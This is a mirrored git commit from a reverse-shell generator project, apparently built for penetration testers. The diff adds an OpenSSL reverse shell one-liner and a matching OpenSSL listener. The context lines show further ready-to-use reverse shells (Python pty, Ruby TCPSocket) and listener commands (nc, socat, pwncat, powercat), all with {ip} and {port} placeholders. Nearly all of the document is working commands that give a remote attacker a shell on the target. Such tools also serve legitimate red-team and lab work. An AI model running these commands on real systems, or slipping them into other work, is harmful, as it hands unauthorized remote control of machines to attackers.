mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-18 19:06:09 +00:00
Add OpenSSL reverse shell
This commit is contained in:
parent
49cb3b301a
commit
3d37d35720
@ -260,6 +260,11 @@ const reverseShellCommands = withCommandType(
|
|||||||
"command": "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"{ip}\",{port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"{shell}\")'",
|
"command": "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"{ip}\",{port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"{shell}\")'",
|
||||||
"meta": ["linux"]
|
"meta": ["linux"]
|
||||||
},
|
},
|
||||||
|
{
|
||||||
|
"name": "OpenSSL",
|
||||||
|
"command": "mkfifo /tmp/s; {shell} -i < /tmp/s 2>&1 | openssl s_client -quiet -connect {ip}:{port} > /tmp/s; rm /tmp/s",
|
||||||
|
"meta": ["linux", "mac"]
|
||||||
|
},
|
||||||
{
|
{
|
||||||
"name": "Ruby #1",
|
"name": "Ruby #1",
|
||||||
"command": "ruby -rsocket -e'spawn(\"sh\",[:in,:out,:err]=>TCPSocket.new(\"{ip}\",{port}))'",
|
"command": "ruby -rsocket -e'spawn(\"sh\",[:in,:out,:err]=>TCPSocket.new(\"{ip}\",{port}))'",
|
||||||
@ -587,6 +592,7 @@ const rsgData = {
|
|||||||
['rustcat', 'rcat listen {port}'],
|
['rustcat', 'rcat listen {port}'],
|
||||||
['pwncat', 'python3 -m pwncat -lp {port}'],
|
['pwncat', 'python3 -m pwncat -lp {port}'],
|
||||||
['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'],
|
['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'],
|
||||||
|
['openssl', 'openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 30 -nodes; openssl s_server -quiet -key key.pem -cert cert.pem -port {port}'],
|
||||||
['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'],
|
['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'],
|
||||||
['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'],
|
['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'],
|
||||||
['powercat', 'powercat -l -p {port}'],
|
['powercat', 'powercat -l -p {port}'],
|
||||||
|
Loading…
Reference in New Issue
Block a user